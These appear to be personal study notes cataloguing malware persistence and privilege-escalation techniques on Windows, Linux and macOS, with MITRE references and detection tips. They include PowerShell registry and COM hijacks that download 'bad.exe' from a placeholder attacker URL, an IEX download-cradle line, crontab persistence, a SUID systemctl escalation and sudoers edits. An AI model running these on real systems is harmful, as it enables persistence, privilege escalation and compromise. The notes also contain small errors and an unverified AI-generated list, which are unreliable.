Techniques

This is about … .

🔖
.014

Active Setup (Not yet processed)

Startup

Windows

The list of reg keys that could be abused for persistence and escalation: the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (default)

• all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp (default)
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (default)
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce (default)
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (default)
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce (default)
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
• HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell 
• HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
• multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
• Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
• Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.
• Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.
  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events
  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
• HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages, HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages - load into LSA space, meaning having access to unencrypted password info.

📘 BTFM

autorunsc -v [options] > result.csv

Linux

/etc/systemd/system  
/usr/lib/systemd/system 
/etc/init*

macOS

Login Items

System Preferences -> Users & Groups -> Login Items. Additional: SDF podcast.

How to determine if it’s malicious? Well, the sure way is only to reverse engineer it, but it is time consuming. So, you need to narrow down the candidates first. There are a couple of indicators that are commonly seen in malware.

Login items run within the user’s desktop session, inheriting the user’s permissions, and start automatically at user login. Due to this afforded persistence, Mac malware will commonly install itself as a login item. You can find examples of this technique in malware like Kitm, NetWire, and WindTail. Wardle, Patrick. The Art of Mac Malware (p. 24). No Starch Press. Kindle Edition.

❗️ macOS doesn’t readily show the full path to a persisted login item in its interface (unless you hover over the item for a few seconds)

👻 backgroundtaskmanagementagent is a daemon that is running in the background and thus also manages login items. The list of the items is stored in a file ⚙️ named backgrounditems.btm.

Programming persistence

⚙️ LSSharedFileListCreate (returns the reference to the list) -> LSSharedFileListInsertItemURL (adds a new item, requires a full path to the item).

To view the APIs used run nm WindTail/Final_Presentation.app/Contents/MacOS/usrnode. Seeing the above two APIs in the list suggest this persistence mechanism was used by the binary.

🥷🏼 (stealthy) SMLoginItemSetEnabled - the “Modern Login Items” blog post or Apple’s documentation on the topic. This allows application-specific helper login items. They don’t show up in the Preferences. Those items are stored in LoginItems subdirectory of an application’s bundle.

Boot

Windows

Flashing BIOS

Update BIOS with the malicious code included. More here.

Boot execute

Not sure what that means https://www.tenable.com/plugins/nessus/70615. Could be this:

🔑 HKLM\System\CurrentControlSet\Control\ServiceControlManagerExtension 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\Execute 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\S0InitialCommand 🔑 HKLM\System\CurrentControlSet\Control\Session Manager\SetupExecute

Services

Windows

🔑 HKLM\SYSTEM\CurrentControlSet\Services. The executable needs to have certain code and permissions for service behaviour, and there are three options to accomplish that:

1. New service. If Start value = 0x2 (see 🔑 above), start the service at boot. Example 🦠: APT1, RIP listener service. ⚒️sc [queryex|qc|qprivs|qtriggerinfo].
2. Hijacking, aka Replacement. Required modifications to some existing services. Usually, some rarely used one. Example 🦠: GlassRAT.
3. Service failure recovery. Load something 🦠bad when something good and service-like 👼 crashes. You can define what to do if a certain service crashes; usually it’s restarting the service. However, this setting can be changed to launch another executable. ⚒️ Kansa Powershell Framework (Get_SvcFail.ps1 script), event logs.

Kansa has several scripts to stack services. You can also use the general one:

.\Get-LogparserStack.ps1 -FilePattern *SvcAll.csv -Delimiter "," -Direction asc -OutFile SvcAll-workstation-stack.csv

To do the same job with PowerShell:

$csvFiles = Get-ChildItem -Path ".\*SvcAll.csv"
$result = @()

foreach ($csvFile in $csvFiles) {
    $data = Import-Csv -Path $csvFile.FullName
    $result += $data
}

$result[0] | Get-Member -MemberType NoteProperty | Select-Object Name
$groupedData = $result | Group-Object -Property Name, PathName | Select-Object Count, Name, PathName, @{Name="PC"; Expression={$_.Group.'PSComputerName'}}
$groupedData | Export-Csv -Path "result.csv" -NoTypeInformation

Linux

Unused services. To disable a service:

sudo systemctl stop <servicename>
sudo systemctl disable <servicename>

macOS

⚙️ The most relevant keys in a plist would be the following:

1. Label
2. Arguments
3. RunAtLoad - persistence.
4. PathState (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)
5. StartCalendarInterval (https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf)

👻 launchd process is responsible for running these items. 📚 Reference: A Launch tutorial, https://www.launchd.info/; “Getting Started with Launchd for Sys Admins,” Penn State MacAdmins Conference 2012, https://macadmins.psu.edu/files/2012/11/psumacconf2012-launchd.pdf.

An example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC ...>
<plist version="1.0"><dict>
 <key>Label</key>    
 <string>com.foo.bar</string>   
 <key>ProgramArguments</key>
     <array>        
    <string>/Users/user/launchItem</string>       
    <string>argument 1</string>    
    <string>argument 2</string>    
 </array>    
 <key>RunAtLoad</key>    
1 <true/> 
</dict>
</plist>

Wardle, Patrick. The Art of Mac Malware (p. 27). No Starch Press. Kindle Edition.

Agents

Run once the user is logged in. Do not have root permissions. They may interract with the user session.

The plists can be found here:

/Library/LaunchAgents 
~/Library/LaunchAgents

# to read the file run
plutil -p <path to plist>
defaults read <path to plist>

Daemons

They usually run before the user logs in. Do not require user interaction. They run with 👑 root permissions.

The plists can be found here:

/Library/LaunchDaemons

# to read the file run
plutil -p <path to plist>
defaults read <path to plist>



## Libs

### Windows

For some of the injection techniques (low-level ones), see the [injections](/docs/reverse/malware-analysis/injections) article.

#### DLL Sideloading

Following is the search order for modern Windows systems:

1. Manifest (if the application provides an absolute path to the `dll`)
2. Search the RAM for the same module. No searching.
3. Dlls in the same direction as the executable that loads it
4. `KnowDLLs` list `HKLM\SYSTEM\CurrentControlSet\Control\WOW`  or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs` ([docs](KnowDLLs` list `HKLM\SYSTEM\CurrentControlSet\Control\WOW`)). So, if the dll is in the list, the link from the registry is used, and there is no search conducted. 
6. Application's loading directory
7. `C:\Windows\System32`
8. `C:\Windows\system`
9. `C:\Windows`
10. Application's registered App Paths directories ❓
11. `PATH` env variable

> ❗️ If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path. [[1](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)] So, that means that we can make a side-loading attack on "a side-loaded `dll`"!

> ❓Not sure about the different paths specified for the KnowDlls entries. This might be due to the different OS versions. See [here](http://stuff.is-a-geek.net/OnlineDocs/Microsoft/NTmisc/Troubleshooting%20NTVDM%20and%20WOW%20startup%20problems.htm):
> 
> For 16-bit apps, Windows NT uses KnownDLLs to implicitly and explicitly load DLLs. The value is at `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WOW`. At this key, `KnownDLLs` is a type `REG_SZ` value which lists the 8.3 DLL names, separated by spaces. Without a `KnownDLLs` entry, `WOW` searches: 
> 1. The current directory.
> 2. The `%SystemRoot%` directory.
> 3. The `%SystemRoot%\SYSTEM` directory.
> 4. The `%SystemRoot%\SYSTEM32` directory.
> 5. The `.exe` file directory.
> 6. The directories in your `Path` environment variable.

With the KnownDLLs entry, WOW only searches the %SystemRoot%\SYSTEM32 directory.

The order depends also on the `SafeDllSearchMode` (🔑 `HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode`).  Here is the quote from the [docs](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications):

>If **SafeDllSearchMode** is enabled ✅, the search order is as follows:
>1. The directory from which the application loaded.
>2. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
>3. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
>4. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
**>5. The current directory.**
>6. The directories are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
>
> If **SafeDllSearchMode** is disabled ⛔️, the search order is as follows:
> 1. The directory from which the application loaded.
**> 2. The current directory.**
> 3. The system directory. Use the [**GetSystemDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
> 4. The 16-bit system directory. No function obtains the path of this directory, but it is searched.
> 5. The Windows directory. Use the [**GetWindowsDirectory**](https://learn.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
> 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.

Side-by-side loading (SxS) mechanism to introduce updated versions of DLL. It can be used to circumvent anti-virus. Example: PlugX RAT. Legitimately signed `exe` uses SxS to load a malicious `dll`. The attacker puts a nefarious `dll` somewhere down the road to make sure it's loaded instead of the legitimate one.

📚 **References**: Read more [here](https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading). 

#### Phantom DLL hijacking

An executable is trying to load a very old `dll`, even though it's superfluous. Some of them don't even exist anymore, for example, `fxsst.dll`. The attacker just creates a dll with the same name and some nefarious functionality.

### macOS

#### Dylibs Environment Variables

```bash
DYLD_*
DYLD_INSERT_LIBRARIES # all libs from this env will be loaded
DYLD_FRAMEWORK_PATH

These libraries are loaded within a trusted host process, not resulting in a new process.

A plist for launch item - EnvironmentVariables. For application - LSEnvironment (Info.plist).

Proxying

Hijacking

Tasks

Windows

C: \Windows\ Tasks\ \*.job
C: \Windows\SchedLgU.txt
C: \Windows\system32\Tasks

at.exe (deprecated but can still be used) and schtasks.exe. For at see at*.job and Schdlgu.txt and Task Scheduler and Security Logs for the second one. WinXP: at jobs run with SYSTEM privileges. Files are created here: \Windows\Tasks and \Windows\System32\Tasks (xml duplicate Win7+). Created with: at.exe 22:22:22 C:\mal.exe or schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe.

📕 RTFM

An attempt to be stealthy.

powershell -W Hidden -nop -noni -ec <base64somthing> # The output of this command won't show a PowerShell window and the output as well. The script to execute is base64 encoded.
# W WindowStyle = Hidden
# nop NoProfile Does not load PS profile
# noni NonINteractive - no interactive prompt to the user presented

# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')

Linux

/etc/cron*  
/var/spool/crontabs 
/var/spool/atjobs  
/etc/anacron

macOS

Cron

/usr/bin/crontab Post-exploitation RT tool EmPyre has a module to exploit this technique.

cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()

The cat and echo commands append the new command. The %s in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * * component instructs macOS to execute the job every hour. The crontab - will reinstall any existing jobs, along with the new one.

At

/private/var/at/jobs/ directory and enumerate them via the /usr/bin/atq utility.

❗️ On a default install of macOS, the at scheduler, /usr/libexec/atrun, is disabled. However, malware can enable it with 👑 root privileges with the following command: launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist.

After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.

Not a popular technique.

Periodic

/etc/periodic

Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. “What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/

Login and Logout Hooks

Look for either LoginHook or LogoutHook in the following plist:

~/Library/Preferences/com.apple.loginwindow.plist

📕 RTFM

#!/bin/bash
export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token) export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/ document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*

Policies

Windows

More about it here. This could be used to allow some legit software.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (when specified in the policy settings)

Office

📚 References: More here.

IPC

Windows

Shell Extension Handlers

Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers. Same under HKLM. ⚠️ No need to provide admin creds to add a value here, to HKCU only. GUID here is the same as listed in CLSID subkey. To add a malicious extension one needs to create a unique GUID, add a subkey to CLSID, add a path to dll, and then add a shell extension in the registry above using the same GUID. Use 🛠 OLE/COM object Viewer to see all COM objects registered. Simply clicking an image or a archive file may trigger a malicious act.

$Path="HKCU:\Software\Classes\*\shellex\ContectMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"

New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1

$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"

Invoke-WebRequest	-Uri $Url -Outfile $Out	

COM Hijack

In Process Monitor filter: Path contains CLSID and Result is NAME NOT FOUND. The entry exists in HKLM\Software\Classes\CLSID\{GUID}, but doesn’t exist at HKCU\Software\Classes\CLSID\{GUID}. It looks for the entry in HKCU first, if not found, in HKLM. That’s where we can add an entry under HKCU. Powershell needs to be used, since it’s a trusted application for registry.

$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\\tmp\bad.exe"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"

Invoke-WebRequest	-Uri $Url -Outfile $Out	

Extension Handler Hijacking

Computer\HKCR\, subkeys Open and Command. An attackere can’t change HKCR or HKLM, but can change HKCU and HKU without admin privileges. Using a proxy within Command will help remain low: proxy.exe "{path/to/real/app}" (starts the meterpreter, for example, then launches the real appliation). ⚠️ Powershell is not necessary, HKU hive can be edited without it.

New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\\tmp\\bad.exe"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Url="https://attackersurl/bad.exe"
$Out="C:\\tmp\\bad.exe"

Invoke-WebRequest	-Uri $Url -Outfile $Out

Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.

Elevation Control Mechanism Abuse

Linux & macOS

setuid and setgid

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/

setuid or setgid bits set in UNIX. chmod u+s [file] or chmod 4777 [file] to set the bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used. Look for the files with the bit set: find / -perm +4000 2>/dev/null and find / -perm +2000 2>/dev/null for the segid.

When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.

One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server: sudo systemctl start apache2. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.

eop=$(mktemp).service # create a temp file with a random unique name and store the name in a eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop # write the config for the service into the file. This unit file will be used by the systemctl to run the process specified in the ExecStart variable. 
# ❗️ Do not copy this code in whole, line by line without the > sign, or else you will not get it work
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)

/bin/systemctl link $eop # This command in Linux creates a symbolic link for the service file specified in the "$eop" environment variable, in the "/etc/systemd/system/" directory, using the systemctl utility. The link created allows the service to be managed with systemctl commands.

/bin/systemctl enable --now $eop # This command in Linux enables and starts the service specified in the "$eop" environment variable, using the systemctl utility. The "enable" option makes the service to start at boot time, while the "--now" option starts the service immediately after the command is executed.

Below is the list generated by ChatGTP (to validate) that shows other executables with this bit set that are potentially useful to the attacker:

/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.

Sudo caching

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/

One can add admin ALL=(ALL) NOPASSWD: ALL to the /etc/sudoers file. Also, malware might monitor /var/db/sudo file for the timestamp and execurte when possible. Also, it’s possible to disable terminal windows isolation, like this: echo \'Defaults !tty_tickets\' >> /etc/sudoers.

AuthorizationExecuteWithPrivileges

Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/

AuthorizationExecuteWithPrivileges API (macOS). Set the preferences to block all programs not downloaded from AppStore. Basically, it brings a prompt and asks the user to grant the permissions. The trick is to be convincing enought so that the user grants the permissions.

Mitigations: least privilege, proper configuration, defense in-depth, zero trust.

Writeups 📚:

• https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
• https://n0w4n.nl/vulnversity/

Windows

UAC Abuse

Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/

Abusing UAC on Windows.

Tokens

MITRE: https://attack.mitre.org/techniques/T1134/001/, https://attack.mitre.org/techniques/T1134/, https://attack.mitre.org/techniques/T1134/002/, https://attack.mitre.org/techniques/T1134/003/, https://attack.mitre.org/techniques/T1134/004/, https://attack.mitre.org/techniques/T1134/005/ Actors: https://attack.mitre.org/groups/G0032/

Techniques:

• Token impersonalisation.
• runas or CreateProcessWithTokenW to create a process with the rights of another user.
• spoof parent process ID
• Windows. SID-history injection. By injecting a fake SID into the SID history of a user account, an attacker can create a new identity with additional access rights without raising any alarms. 🚨 Need elevated privileges. The SID history is stored in the user object’s attribute in the AD database. The attribute is named “SIDHistory” and can be viewed and modified using the Active Directory Users and Computers (ADUC) management console or other AD management tools.

Kernel Modules and Extentions

Linux

LKM

LKM for Linux. Drivers are one type of kernel extentions.

XDG

https://attack.mitre.org/techniques/T1547/013/

macOS

kext

kext for macOS. kextload and kextunload. These need to be signed with a cert approved by Apple. Otherwise, to launch the app one needs to disable SIP. That’s probably the reason why the RAM cannot be dumped on macOS with SIP enabled. Replaced by System Extentions but still can be used.

reopen

Remember the “Reopen windows when logging back in” prompt on macOS? When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory. Applications listed in this file are automatically reopened upon the user’s next logon.

Windows

LSASS driver

Shortcuts

Abuse shortcuts in the startup folder to execute their tools and achieve persistence

Port Monitors

1. AddMonitor API call. spoolsv.exe runs under SYSTEM privileges.
2. HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors (option #2)
   1. Local Port
   2. Standard TCP/IP Port
   3. USB Monitor
   4. WSD Port

Print Processors

Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe (SYSTEM permissions, during boot.

1. AddPrintProcessor for account with SeLoadDriverPrivilege flag set.
2. adding the HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver Registry key that points to the DLL.

References